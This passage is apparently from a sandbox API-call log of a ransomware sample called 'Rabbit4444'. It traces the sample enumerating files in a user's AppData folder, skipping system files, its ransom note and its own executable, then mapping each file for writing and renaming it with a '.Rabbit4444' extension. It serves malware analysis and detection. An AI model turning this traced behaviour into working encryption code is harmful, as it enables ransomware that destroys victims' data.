4SUFJ.flv", lpString2="..") returned 1 [0050.517] lstrcmpiW (lpString1="uK 4SUFJ.flv", lpString2="windows") returned -1 [0050.517] lstrcmpiW (lpString1="uK 4SUFJ.flv", lpString2="bootmgr") returned 1 [0050.517] lstrcmpiW (lpString1="uK 4SUFJ.flv", lpString2="pagefile.sys") returned 1 [0050.517] lstrcmpiW (lpString1="uK 4SUFJ.flv", lpString2="boot") returned 1 [0050.517] lstrcmpiW (lpString1="uK 4SUFJ.flv", lpString2="ids.txt") returned 1 [0050.517] lstrcmpiW (lpString1="uK 4SUFJ.flv", lpString2="NTUSER.DAT") returned 1 [0050.518] lstrcpyW (in: lpString1=0x130eb78, lpString2="uK 4SUFJ.flv" | out: lpString1="uK 4SUFJ.flv") returned="uK 4SUFJ.flv" [0050.518] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\uK 4SUFJ.flv", dwFileAttributes=0x0) returned 1 [0050.518] lstrlenW (lpString="uK 4SUFJ.flv") returned 12 [0050.518] lstrlenW (lpString="Rabbit4444") returned 10 [0050.518] lstrcmpiW (lpString1=" 4SUFJ.flv", lpString2="Rabbit4444") returned -1 [0050.518] lstrlenW (lpString=".dll") returned 4 [0050.518] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0050.518] lstrlenW (lpString=".lnk") returned 4 [0050.518] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0050.518] lstrlenW (lpString=".ini") returned 4 [0050.518] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0050.518] lstrlenW (lpString=".sys") returned 4 [0050.518] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0050.518] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\uK 4SUFJ.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\uk 4sufj.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.518] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.518] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14182894889) returned 1 [0050.518] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=56095) returned 1 [0050.518] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0050.518] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0050.518] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xde20, lpName=0x0) returned 0x298 [0050.518] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xde20) returned 0x70000 [0050.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0050.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0050.520] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0050.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0050.520] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14183108424) returned 1 [0050.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0050.520] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0050.520] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.521] CloseHandle (hObject=0x298) returned 1 [0050.521] CloseHandle (hObject=0x278) returned 1 [0050.522] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\uK 4SUFJ.flv.Rabbit4444") returned 55 [0050.522] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\uK 4SUFJ.flv" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\uk 4sufj.flv"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\uK 4SUFJ.flv.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\uk 4sufj.flv.rabbit4444"), dwFlags=0x1) returned 1 [0050.522] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79eee9f0, ftCreationTime.dwHighDateTime=0x1d4cf9e, ftLastAccessTime.dwLowDateTime=0xfcdae360, ftLastAccessTime.dwHighDateTime=0x1d4cdc2, ftLastWriteTime.dwLowDateTime=0xfcdae360, ftLastWriteTime.dwHighDateTime=0x1d4cdc2, nFileSizeHigh=0x0, nFileSizeLow=0xcd65, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UOXinrBcB5E_5943Ki.docx", cAlternateFileName="UOXINR~1.DOC")) returned 1 [0050.522] lstrcmpiW (lpString1="UOXinrBcB5E_5943Ki.docx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.522] lstrcmpiW (lpString1="UOXinrBcB5E_5943Ki.docx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.522] lstrcmpiW (lpString1="UOXinrBcB5E_5943Ki.docx", lpString2="Rabbit4444.exe") returned 1 [0050.522] lstrcmpiW (lpString1="UOXinrBcB5E_5943Ki.docx", lpString2=".") returned 1 [0050.522] lstrcmpiW (lpString1="UOXinrBcB5E_5943Ki.docx", lpString2="..") returned 1 [0050.522] lstrcmpiW (lpString1="UOXinrBcB5E_5943Ki.docx", lpString2="windows") returned -1 [0050.522] lstrcmpiW (lpString1="UOXinrBcB5E_5943Ki.docx", lpString2="bootmgr") returned 1 [0050.522] lstrcmpiW (lpString1="UOXinrBcB5E_5943Ki.docx", lpString2="pagefile.sys") returned 1 [0050.522] lstrcmpiW (lpString1="UOXinrBcB5E_5943Ki.docx", lpString2="boot") returned 1 [0050.522] lstrcmpiW (lpString1="UOXinrBcB5E_5943Ki.docx", lpString2="ids.txt") returned 1 [0050.522] lstrcmpiW (lpString1="UOXinrBcB5E_5943Ki.docx", lpString2="NTUSER.DAT") returned 1 [0050.522] lstrcpyW (in: lpString1=0x130eb78, lpString2="UOXinrBcB5E_5943Ki.docx" | out: lpString1="UOXinrBcB5E_5943Ki.docx") returned="UOXinrBcB5E_5943Ki.docx" [0050.522] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\UOXinrBcB5E_5943Ki.docx", dwFileAttributes=0x0) returned 1 [0050.523] lstrlenW (lpString="UOXinrBcB5E_5943Ki.docx") returned 23 [0050.523] lstrlenW (lpString="Rabbit4444") returned 10 [0050.523] lstrcmpiW (lpString1="943Ki.docx", lpString2="Rabbit4444") returned -1 [0050.523] lstrlenW (lpString=".dll") returned 4 [0050.523] lstrcmpiW (lpString1="docx", lpString2=".dll") returned 1 [0050.523] lstrlenW (lpString=".lnk") returned 4 [0050.523] lstrcmpiW (lpString1="docx", lpString2=".lnk") returned 1 [0050.523] lstrlenW (lpString=".ini") returned 4 [0050.523] lstrcmpiW (lpString1="docx", lpString2=".ini") returned 1 [0050.523] lstrlenW (lpString=".sys") returned 4 [0050.523] lstrcmpiW (lpString1="docx", lpString2=".sys") returned 1 [0050.523] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\UOXinrBcB5E_5943Ki.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\uoxinrbcb5e_5943ki.docx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.523] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.523] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14183386862) returned 1 [0050.523] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=52581) returned 1 [0050.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0050.523] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0050.523] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd070, lpName=0x0) returned 0x298 [0050.523] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd070) returned 0x70000 [0050.525] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.525] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.525] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0050.525] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0050.525] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0050.526] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14183631842) returned 1 [0050.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0050.526] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0050.526] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.526] CloseHandle (hObject=0x298) returned 1 [0050.526] CloseHandle (hObject=0x278) returned 1 [0050.527] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\UOXinrBcB5E_5943Ki.docx.Rabbit4444") returned 66 [0050.527] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\UOXinrBcB5E_5943Ki.docx" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\uoxinrbcb5e_5943ki.docx"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\UOXinrBcB5E_5943Ki.docx.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\uoxinrbcb5e_5943ki.docx.rabbit4444"), dwFlags=0x1) returned 1 [0050.527] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb83cb010, ftCreationTime.dwHighDateTime=0x1d4d4ae, ftLastAccessTime.dwLowDateTime=0x194cfc70, ftLastAccessTime.dwHighDateTime=0x1d4cc76, ftLastWriteTime.dwLowDateTime=0x194cfc70, ftLastWriteTime.dwHighDateTime=0x1d4cc76, nFileSizeHigh=0x0, nFileSizeLow=0x16bf2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WORvZy.jpg", cAlternateFileName="")) returned 1 [0050.527] lstrcmpiW (lpString1="WORvZy.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.527] lstrcmpiW (lpString1="WORvZy.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.528] lstrcmpiW (lpString1="WORvZy.jpg", lpString2="Rabbit4444.exe") returned 1 [0050.528] lstrcmpiW (lpString1="WORvZy.jpg", lpString2=".") returned 1 [0050.528] lstrcmpiW (lpString1="WORvZy.jpg", lpString2="..") returned 1 [0050.528] lstrcmpiW (lpString1="WORvZy.jpg", lpString2="windows") returned 1 [0050.528] lstrcmpiW (lpString1="WORvZy.jpg", lpString2="bootmgr") returned 1 [0050.528] lstrcmpiW (lpString1="WORvZy.jpg", lpString2="pagefile.sys") returned 1 [0050.528] lstrcmpiW (lpString1="WORvZy.jpg", lpString2="boot") returned 1 [0050.528] lstrcmpiW (lpString1="WORvZy.jpg", lpString2="ids.txt") returned 1 [0050.528] lstrcmpiW (lpString1="WORvZy.jpg", lpString2="NTUSER.DAT") returned 1 [0050.528] lstrcpyW (in: lpString1=0x130eb78, lpString2="WORvZy.jpg" | out: lpString1="WORvZy.jpg") returned="WORvZy.jpg" [0050.528] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\WORvZy.jpg", dwFileAttributes=0x0) returned 1 [0050.528] lstrlenW (lpString="WORvZy.jpg") returned 10 [0050.528] lstrlenW (lpString="Rabbit4444") returned 10 [0050.528] lstrcmpiW (lpString1="WORvZy.jpg", lpString2="Rabbit4444") returned 1 [0050.528] lstrlenW (lpString=".dll") returned 4 [0050.528] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0050.528] lstrlenW (lpString=".lnk") returned 4 [0050.528] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0050.528] lstrlenW (lpString=".ini") returned 4 [0050.528] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0050.528] lstrlenW (lpString=".sys") returned 4 [0050.528] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0050.528] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\WORvZy.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\worvzy.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.528] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.528] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14183918434) returned 1 [0050.528] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=93170) returned 1 [0050.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0050.529] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0050.529] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16f00, lpName=0x0) returned 0x298 [0050.529] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16f00) returned 0x70000 [0050.531] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.531] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0050.531] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.531] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0050.531] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.531] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0050.531] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.531] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0050.531] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14184211977) returned 1 [0050.531] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0050.531] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0050.531] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.532] CloseHandle (hObject=0x298) returned 1 [0050.532] CloseHandle (hObject=0x278) returned 1 [0050.533] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\WORvZy.jpg.Rabbit4444") returned 53 [0050.533] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\WORvZy.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\worvzy.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\WORvZy.jpg.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\worvzy.jpg.rabbit4444"), dwFlags=0x1) returned 1 [0050.533] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d871440, ftCreationTime.dwHighDateTime=0x1d4cd95, ftLastAccessTime.dwLowDateTime=0x8c3edcc0, ftLastAccessTime.dwHighDateTime=0x1d4c5a6, ftLastWriteTime.dwLowDateTime=0x8c3edcc0, ftLastWriteTime.dwHighDateTime=0x1d4c5a6, nFileSizeHigh=0x0, nFileSizeLow=0x4124, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yffge-8ET9yiGGQUqj.avi", cAlternateFileName="YFFGE-~1.AVI")) returned 1 [0050.533] lstrcmpiW (lpString1="Yffge-8ET9yiGGQUqj.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.534] lstrcmpiW (lpString1="Yffge-8ET9yiGGQUqj.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.534] lstrcmpiW (lpString1="Yffge-8ET9yiGGQUqj.avi", lpString2="Rabbit4444.exe") returned 1 [0050.534] lstrcmpiW (lpString1="Yffge-8ET9yiGGQUqj.avi", lpString2=".") returned 1 [0050.534] lstrcmpiW (lpString1="Yffge-8ET9yiGGQUqj.avi", lpString2="..") returned 1 [0050.534] lstrcmpiW (lpString1="Yffge-8ET9yiGGQUqj.avi", lpString2="windows") returned 1 [0050.534] lstrcmpiW (lpString1="Yffge-8ET9yiGGQUqj.avi", lpString2="bootmgr") returned 1 [0050.534] lstrcmpiW (lpString1="Yffge-8ET9yiGGQUqj.avi", lpString2="pagefile.sys") returned 1 [0050.534] lstrcmpiW (lpString1="Yffge-8ET9yiGGQUqj.avi", lpString2="boot") returned 1 [0050.534] lstrcmpiW (lpString1="Yffge-8ET9yiGGQUqj.avi", lpString2="ids.txt") returned 1 [0050.534] lstrcmpiW (lpString1="Yffge-8ET9yiGGQUqj.avi", lpString2="NTUSER.DAT") returned 1 [0050.534] lstrcpyW (in: lpString1=0x130eb78, lpString2="Yffge-8ET9yiGGQUqj.avi" | out: lpString1="Yffge-8ET9yiGGQUqj.avi") returned="Yffge-8ET9yiGGQUqj.avi" [0050.534] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yffge-8ET9yiGGQUqj.avi", dwFileAttributes=0x0) returned 1 [0050.534] lstrlenW (lpString="Yffge-8ET9yiGGQUqj.avi") returned 22 [0050.534] lstrlenW (lpString="Rabbit4444") returned 10 [0050.534] lstrcmpiW (lpString1="GGQUqj.avi", lpString2="Rabbit4444") returned -1 [0050.534] lstrlenW (lpString=".dll") returned 4 [0050.534] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0050.534] lstrlenW (lpString=".lnk") returned 4 [0050.534] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0050.534] lstrlenW (lpString=".ini") returned 4 [0050.534] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0050.534] lstrlenW (lpString=".sys") returned 4 [0050.534] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0050.534] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yffge-8ET9yiGGQUqj.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yffge-8et9yiggquqj.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.534] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.534] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14184523289) returned 1 [0050.535] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16676) returned 1 [0050.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0050.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0050.535] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4430, lpName=0x0) returned 0x298 [0050.535] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4430) returned 0x70000 [0050.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0050.535] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0050.535] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0050.536] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0050.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0050.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0050.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0050.536] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14184664242) returned 1 [0050.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0050.536] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0050.536] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0050.536] CloseHandle (hObject=0x298) returned 1 [0050.536] CloseHandle (hObject=0x278) returned 1 [0050.537] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yffge-8ET9yiGGQUqj.avi.Rabbit4444") returned 65 [0050.537] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yffge-8ET9yiGGQUqj.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yffge-8et9yiggquqj.avi"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Yffge-8ET9yiGGQUqj.avi.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\yffge-8et9yiggquqj.avi.rabbit4444"), dwFlags=0x1) returned 1 [0050.537] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4fe239a0, ftCreationTime.dwHighDateTime=0x1d4c828, ftLastAccessTime.dwLowDateTime=0x185c6d00, ftLastAccessTime.dwHighDateTime=0x1d4d17b, ftLastWriteTime.dwLowDateTime=0x185c6d00, ftLastWriteTime.dwHighDateTime=0x1d4d17b, nFileSizeHigh=0x0, nFileSizeLow=0xc537, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YwMCDPenkGT OtMk.m4a", cAlternateFileName="YWMCDP~1.M4A")) returned 1 [0050.537] lstrcmpiW (lpString1="YwMCDPenkGT OtMk.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0050.537] lstrcmpiW (lpString1="YwMCDPenkGT OtMk.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0050.537] lstrcmpiW (lpString1="YwMCDPenkGT OtMk.m4a", lpString2="Rabbit4444.exe") returned 1 [0050.538] lstrcmpiW (lpString1="YwMCDPenkGT OtMk.m4a", lpString2=".") returned 1 [0050.538] lstrcmpiW (lpString1="YwMCDPenkGT OtMk.m4a", lpString2="..") returned 1 [0050.538] lstrcmpiW (lpString1="YwMCDPenkGT OtMk.m4a", lpString2="windows") returned 1 [0050.538] lstrcmpiW (lpString1="YwMCDPenkGT OtMk.m4a", lpString2="bootmgr") returned 1 [0050.538] lstrcmpiW (lpString1="YwMCDPenkGT OtMk.m4a", lpString2="pagefile.sys") returned 1 [0050.538] lstrcmpiW (lpString1="YwMCDPenkGT OtMk.m4a", lpString2="boot") returned 1 [0050.538] lstrcmpiW (lpString1="YwMCDPenkGT OtMk.m4a", lpString2="ids.txt") returned 1 [0050.538] lstrcmpiW (lpString1="YwMCDPenkGT OtMk.m4a", lpString2="NTUSER.DAT") returned 1 [0050.538] lstrcpyW (in: lpString1=0x130eb78, lpString2="YwMCDPenkGT OtMk.m4a" | out: lpString1="YwMCDPenkGT OtMk.m4a") returned="YwMCDPenkGT OtMk.m4a" [0050.538] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\YwMCDPenkGT OtMk.m4a", dwFileAttributes=0x0) returned 1 [0050.538] lstrlenW (lpString="YwMCDPenkGT OtMk.m4a") returned 20 [0050.538] lstrlenW (lpString="Rabbit4444") returned 10 [0050.538] lstrcmpiW (lpString1="T OtMk.m4a", lpString2="Rabbit4444") returned 1 [0050.538] lstrlenW (lpString=".dll") returned 4 [0050.538] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0050.538] lstrlenW (lpString=".lnk") returned 4 [0050.538] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0050.538] lstrlenW (lpString=".ini") returned 4 [0050.538] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0050.538] lstrlenW (lpString=".sys") returned 4 [0050.538] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0050.538] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\YwMCDPenkGT OtMk.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ywmcdpenkgt otmk.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0050.538] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0050.538] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14184919243) returned 1 [0050.538] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=50487) returned 1 [0050.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0050.539] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0050.539] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc840, lpName=0x0) returned 0x298 [0050.539] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc840) returned 0x70000 [0050.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0050.540] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0050.540] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, 